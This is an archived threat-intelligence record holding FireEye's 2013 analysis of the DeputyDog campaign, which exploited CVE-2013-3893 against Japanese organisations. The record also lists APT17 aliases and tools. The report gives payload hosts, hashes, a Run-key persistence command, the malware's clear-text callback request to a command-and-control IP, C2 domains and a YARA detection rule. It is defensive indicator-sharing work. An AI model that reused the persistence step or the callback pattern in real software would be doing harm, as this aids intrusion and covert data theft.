{ "id": "05da4842-020f-4e58-a061-930d16b9ae84", "created_at": "2026-04-06T00:06:20.026237Z", "updated_at": "2026-04-10T03:37:58.706101Z", "deleted_at": null, "sha1_hash": "65ca8fedb800ca4f2d52961ffdded12d84bd6fdb", "title": "Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against Japanese Targets", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 173990, "plain_text": "Operation DeputyDog: Zero-Day (CVE-2013-3893) Attack Against\r\nJapanese Targets\r\nBy Ned Moran\r\nPublished: 2013-09-21 · Archived: 2026-04-05 18:57:39 UTC\r\nFireEye has discovered a campaign leveraging the recently announced zero-day CVE-2013-3893. This campaign,\r\nwhich we have labeled ‘Operation DeputyDog’, began as early as August 19, 2013 and appears to have targeted\r\norganizations in Japan. FireEye Labs has been continuously monitoring the activities of the threat actor\r\nresponsible for this campaign. Analysis based on our Dynamic Threat Intelligence cluster shows that this current\r\ncampaign leveraged command and control infrastructure that is related to the infrastructure used in the attack on\r\nBit9.\r\nCampaign Details\r\nOn September 17, 2013 Microsoft published details regarding a new zero-day exploit in Internet Explorer that was\r\nbeing used in targeted attacks. FireEye can confirm reports that these attacks were directed against entities in\r\nJapan. Furthermore, FireEye has discovered that the group responsible for this new operation is the same\r\nthreat actor that compromised Bit9 in February 2013.\r\nFireEye detected the payload used in these attacks on August 23, 2013 in Japan. The payload was hosted on a\r\nserver in Hong Kong (210.176.3.130) and was named “img20130823.jpg”. Although it had a .jpg file extension, it\r\nwas not an image file. The file, when XORed with 0×95, was an executable (MD5:\r\n8aba4b5184072f2a50cbc5ecfe326701).\r\nUpon execution, 8aba4b5184072f2a50cbc5ecfe326701 writes “28542CC0.dll” (MD5:\r\n46fd936bada07819f61ec3790cb08e19) to this location:\r\nC:\\Documents and Settings\\All Users\\Application Data\\28542CC0.dll\r\nIn order to maintain persistence, the original malware adds this registry key:\r\nHKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\28542CC0\r\nThe registry key has this value:\r\nrundll32.exe “C:\\Documents and Settings\\All Users\\Application Data\\28542CC0.dll”,Launch\r\nThe malware (8aba4b5184072f2a50cbc5ecfe326701) then connects to a host in South Korea (180.150.228.102).\r\nThis callback traffic is HTTP over port 443 (which is typically used for HTTPS encrypted traffic; however, the\r\ntraffic is not HTTPS nor SSL encrypted). Instead, this clear-text callback traffic resembles this pattern:\r\nPOST /info.asp HTTP/1.1\r\nContent-Type: application/x-www-form-urlencoded\r\nhttps://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html\r\nPage 1 of 4\n\nAgtid: [8 chars]08x\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Win32)\r\nHost: 180.150.228.102:443\r\nContent-Length: 1045\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\n[8 chars]08x\u0026[Base64 Content]\r\nThe unique HTTP header “Agtid:” contains 8 characters followed by “08x”. The same pattern can be seen in the\r\nPOST content as well.\r\nA second related sample was also delivered from 111.118.21.105/css/sun.css on September 5, 2013. The sun.css\r\nfile was a malicious executable with an MD5 of bd07926c72739bb7121cec8a2863ad87 and it communicated with\r\nthe same communications protocol described above to the same command and control server at 180.150.228.102.\r\nRelated Samples\r\nWe found that both droppers, bd07926c72739bb7121cec8a2863ad87 and 8aba4b5184072f2a50cbc5ecfe326701,\r\nwere compiled on 2013-08-19 at 13:21:59 UTC. As we examined these files, we noticed a unique fingerprint.\r\nThese samples both had a string that may have been an artifact of the builder used to create the binaries. This\r\nstring was “DGGYDSYRL”, which we refer to as “DeputyDog”. As such, we developed the following YARA\r\nsignature, based on this unique attribute:\r\nrule APT_DeputyDog_Strings\r\n{\r\nmeta:\r\nauthor = “FireEye Labs”\r\nversion = “1.0″\r\ndescription = “detects string seen in samples used in 2013-3893 0day attacks”\r\nreference = “8aba4b5184072f2a50cbc5ecfe326701″\r\nstrings:\r\n$mz = {4d 5a}\r\n$a = “DGGYDSYRL”\r\ncondition:\r\n($mz at 0) and $a\r\n}\r\nWe used this signature to identify 5 other potentially related samples:\r\nhttps://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html\r\nPage 2 of 4\n\nMD5 Compile Time (UTC) C2 Server\r\n58dc05118ef8b11dcb5f5c596ab772fd 2013-08-19 13:21:58 180.150.228.102\r\n4d257e569539973ab0bbafee8fb87582 2013-08-19 13:21:58 103.17.117.90\r\ndbdb1032d7bb4757d6011fb1d077856c 2013-08-19 13:21:59 110.45.158.5\r\n645e29b7c6319295ae8b13ce8575dc1d 2013-08-19 13:21:59 103.17.117.90\r\ne9c73997694a897d3c6aadb26ed34797 2013-04-13 13:42:45 110.45.158.5\r\nNote that all of the samples, except for e9c73997694a897d3c6aadb26ed34797, were compiled on 2013-08-19,\r\nwithin 1 second of each other.\r\nWe pivoted off the command and control IP addresses used by these samples and found the following known\r\nmalicious domains recently pointed to 180.150.228.102.\r\nDomain First Seen Last Seen\r\nea.blankchair.com 2013-09-01 05:02:22 2013-09-01 08:25:22\r\nrt.blankchair.com 2013-09-01 05:02:21 2013-09-01 08:25:24\r\nali.blankchair.com 2013-09-01 05:02:20 2013-09-01 08:25:22\r\ndll.freshdns.org 2013-07-01 10:48:56 2013-07-09 05:00:03\r\nLinks to Previous Campaigns\r\nAccording to Bit9, the attackers that penetrated their network dropped two variants of the HiKit rootkit.\r\nOne of these Hitkit samples connected to a command and control server at downloadmp3server[.]servemp3[.]com\r\nthat resolved to 66.153.86.14. This same IP address also hosted www[.]yahooeast[.]net, a known malicious\r\ndomain, between March 6, 2012 and April 22, 2012.\r\nThe domain yahooeast[.]net was registered to 654@123.com. This email address was also used to register\r\nblankchair[.]com – the domain that we see was pointed to the 180.150.228.102 IP, which is the callback associated\r\nwith sample 58dc05118ef8b11dcb5f5c596ab772fd, and has been already correlated back to the attack leveraging\r\nthe CVE-2013-3893 zero-day vulnerability.\r\nThreat Actor Attribution\r\nhttps://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html\r\nPage 3 of 4\n\nConclusion\r\nWhile these attackers have a demonstrated previously unknown zero-day exploits and a robust set of malware\r\npayloads, using the techniques described above, it is still possible for network defense professionals to develop a\r\nrich set of indicators that can be used to detect their attacks. This is the first part of our analysis, we will provide\r\nmore detailed analysis on the other components of this attack in subsequent blog post.\r\nSource: https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-ze\r\nro-day-cve-2013-3893-attack-against-japanese-targets.html\r\nhttps://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html\r\nPage 4 of 4", "extraction_quality": 1, "language": "EN", "sources": [ "MISPGALAXY", "Malpedia" ], "references": [ "https://web.archive.org/web/20130924130243/https://www.fireeye.com/blog/technical/cyber-exploits/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" ], "report_names": [ "operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html" ], "threat_actors": [ { "id": "ee39ecf0-d311-49e5-b0ae-3e3d71f71def", "created_at": "2025-08-07T02:03:24.626625Z", "updated_at": "2026-04-10T02:00:03.605175Z", "deleted_at": null, "main_name": "BRONZE KEYSTONE", "aliases": [ "APT17 ", "Aurora Panda ", "DeputyDog ", "Group 72 ", "Hidden Lynx ", "TG-8153 ", "Tailgater Team" ], "source_name": "Secureworks:BRONZE KEYSTONE", "tools": [ "9002", "BlackCoffee", "DeputyDog", "Derusbi", "Gh0stHTTPSDropper", "HiKit", "InternalCMD", "PlugX", "PoisonIvy", "ZxShell" ], "source_id": "Secureworks", "reports": null }, { "id": "86fd71d3-06dc-4b73-b038-cedea7b83bac", "created_at": "2022-10-25T16:07:23.330793Z", "updated_at": "2026-04-10T02:00:04.545236Z", "deleted_at": null, "main_name": "APT 17", "aliases": [ "APT 17", "ATK 2", "Beijing Group", "Bronze Keystone", "Deputy Dog", "Elderwood", "Elderwood Gang", "G0025", "G0066", "Operation Aurora", "Operation DeputyDog", "Operation Ephemeral Hydra", "Operation RAT Cook", "SIG22", "Sneaky Panda", "TEMP.Avengers", "TG-8153", "Tailgater Team" ], "source_name": "ETDA:APT 17", "tools": [ "9002 RAT", "AGENT.ABQMR", "AGENT.AQUP.DROPPER", "AGENT.BMZA", "AGENT.GUNZ", "Agent.dhwf", "AngryRebel", "BlackCoffee", "Briba", "Chymine", "Comfoo", "Comfoo RAT", "Darkmoon", "DeputyDog", "Destroy RAT", "DestroyRAT", "Farfli", "Fexel", "Gen:Trojan.Heur.PT", "Gh0st RAT", "Ghost RAT", "Gresim", "HOMEUNIX", "HiKit", "HidraQ", "Homux", "Hydraq", "Jumpall", "Kaba", "Korplug", "Linfo", "MCRAT.A", "McRAT", "MdmBot", "Mdmbot.E", "Moudour", "Mydoor", "Naid", "Nerex", "PCRat", "PNGRAT", "Pasam", "PlugX", "Poison Ivy", "RedDelta", "Roarur", "SPIVY", "Sogu", "TIGERPLUG", "TVT", "Thoper", "Trojan.Naid", "Vasport", "Wiarp", "Xamtrav", "Zox", "ZoxPNG", "ZoxRPC", "gresim", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775433980, "ts_updated_at": 1775792278, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/65ca8fedb800ca4f2d52961ffdded12d84bd6fdb.pdf", "text": "https://archive.orkl.eu/65ca8fedb800ca4f2d52961ffdded12d84bd6fdb.txt", "img": "https://archive.orkl.eu/65ca8fedb800ca4f2d52961ffdded12d84bd6fdb.jpg" } }